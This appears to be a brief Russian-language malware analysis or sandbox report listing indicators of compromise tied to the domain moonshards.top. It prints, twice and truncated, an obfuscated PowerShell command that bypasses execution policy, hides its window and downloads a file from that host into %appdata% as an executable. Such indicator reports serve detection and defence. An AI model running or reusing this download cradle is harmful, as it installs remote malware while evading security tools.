Техническая информация
- http://moonshards.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWe^R^S^h^ELl.e^xe -^E^x^e^C^u^t^Io^N^pOLi^Cy bYpasS -n^OPRo^f^iLE^ ^-WIndOW^s^T^yL^e^ ^HiDDE^n (Ne^w^-^ob^Ject sYS^tem.n^Et^.^we^Bcl^ie^nT).dOWNlOaDFIle('http://moonshards.top/...
- DNS ASK mo###hards.top
- '<SYSTEM32>\cmd.exe' /c "PoWe^R^S^h^ELl.e^xe -^E^x^e^C^u^t^Io^N^pOLi^Cy bYpasS -n^OPRo^f^iLE^ ^-WIndOW^s^T^yL^e^ ^HiDDE^n (Ne^w^-^ob^Ject sYS^tem.n^Et^.^we^Bcl^ie^nT).dOWNlOaDFIle('http://moonshards.top/...' (со скрытым окном)